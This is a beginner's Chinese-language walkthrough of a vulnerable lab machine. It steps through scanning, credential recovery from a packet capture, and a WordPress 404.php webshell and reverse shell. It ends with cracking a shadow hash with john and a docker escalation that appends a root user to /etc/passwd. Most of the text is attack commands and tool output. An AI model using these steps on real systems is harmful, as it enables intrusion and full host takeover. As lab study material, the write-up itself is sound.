1.目标主机网卡MAC地址为0800279564DD,如下所示; 2.使用以下命令扫描目标主机地址;
sudo netdiscover -r 192.168.2.1 192.168.2.134 08:00:27:95:64:dd 2 120 PCS Systemtechnik GmbH1.使用如下命令对目标进行端口扫描,如下所示;
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 192.168.2.134 22/tcp closed ssh conn-refused 80/tcp open http syn-ack Apache httpd (PHP 7.3.17) 443/tcp open ssl/http syn-ack Apache httpd (PHP 7.3.17) 6777/tcp open ftp syn-ack vsftpd 3.0.32.使用如下命令对目标进行服务扫描,如下所示;
nikto -h 192.168.2.134 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.2.134 + Target Hostname: 192.168.2.134 + Target Port: 80 + Start Time: 2020-06-29 21:15:21 (GMT-4) --------------------------------------------------------------------------- + Server: Apache + Retrieved x-powered-by header: PHP/7.3.17 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'link' found, with contents: <http://192.168.2.134/wp-json/>; rel="https://api.w.org/" + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Uncommon header 'x-redirect-by' found, with contents: WordPress + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302) + "robots.txt" contains 2 entries which should be manually viewed. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + Cookie wordpress_test_cookie created without the httponly flag + Cookie goto created without the httponly flag + Cookie back created without the httponly flag + Uncommon header 'x-ob_mode' found, with contents: 1 + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3092: /secret/: This might be interesting... + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + /wp-app.log: Wordpress' wp-app.log may leak application/system details. + /wordpresswp-app.log: Wordpress' wp-app.log may leak application/system details. + /: A Wordpress installation was found. + /wordpress: A Wordpress installation was found. + /phpmyadmin/: phpMyAdmin directory found + OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + 7919 requests: 0 error(s) and 24 item(s) reported on remote host + End Time: 2020-06-29 21:21:53 (GMT-4) (392 seconds) --------------------------------------------------------------------------- + 1 host(s) tested3.根据nikto扫描结果得知,目标80端口使用wordpress框架,使用wpscan进行扫描,如下所示;
wpscan --url http://192.168.2.134 --enumerate ap,at,cb,dbe _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.2.134/ [192.168.2.134] [+] Started: Mon Jun 29 21:18:56 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache | - X-Powered-By: PHP/7.3.17 | - X-Mod-Pagespeed: 1.13.35.2-0 | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://192.168.2.134/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100%4.使用dirb对目录进行扫描,得到如下结果;
https://192.168.2.134/tasks5.根据提示可以猜测到用户名jarretlee,进行密码找回尝试; 6.根据提示可知账户正确,接下来根据提示寻找pcapng文件,经过构造,可以通过jarret.pcapng进行访问,如下所示;
http://192.168.2.134/jarret.pcapng7.得到一个wireshark包,启动wireshark对文件进行分析; 8.经过查看流量包,得到如下信息;
jarretlee nopassword jarretlee passwordis jarret jarretlee jarretLEE jarretlee NoBrUtEfOrCe__R3Qu1R3d__9.使用账号密码登录尝试; 10.登录成功,发现草稿中存在一个base64密文,使用解密工具解密结果如下;
QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE @lways-@-Sup3r-Secur3-p@SSw0Rd!!11.使用该密码登录wordpress不成功,登录phpmyadmin成功,如下所示; 12.查看wordpress用户密码,修改charleywalker密码,如下所示; 13.使用账号charleywalker和密码NoBrUtEfOrCe__R3Qu1R3d__进行登录,如下所示; 14.在404.php中写入恶意代码,如下所示;
1.开启监听,构造反弹shell,对404页面访问尝试;
1.使用如下命令获得TTY shell;
python3 -c 'import pty;pty.spawn("/bin/bash")'2.查看用户列表发现该用户具有docker权限;
uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)3.使用用户jarretlee密码NoBrUtEfOrCe__R3Qu1R3d__切换用户到jarretlee,查看home文件,如下所示; 4.发现密文,使用base64解密,得到jeevan用户文件;
amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6 jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::5.使用john进行破解,如下所示;
kali@kali:~/oscp/passwd/john$ sudo john --rules --wordlist=/usr/share/wordlists/rockyou.txt passswdhadow.txt [sudo] password for kali: Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status hannahmontana (jeevan) 1g 0:00:00:01 DONE (2020-06-30 22:34) 0.5617g/s 1438p/s 1438c/s 1438C/s slimshady..hassan Use the "--show" option to display all of the cracked passwords reliably Session completed6.得到密码hannahmontana (jeevan),切换用户,使用docker提权;
docker run -v /etc/:/mnt -it alpine cd /mnt echo 'raj:$6$BiEAYF4pzDp5QJXH$00iURpImugngJWdAraUxBFfU76xovc6mwuQMe479uN28NesybQxOW7TiLxqrn99nJCfvISJtJiXgIjtTicF720:0:0:root:/root:/bin/bash' >> passwd /mnt # exit exit jeevan@debian:/home/jarretlee$ su raj su raj Password: kali root@debian:/home/jarretlee#7.提权成功,查看证明文件。; 因为中间关机过,所以目标地址变化过,由于我是新手,有不对的地方欢迎大家指正。
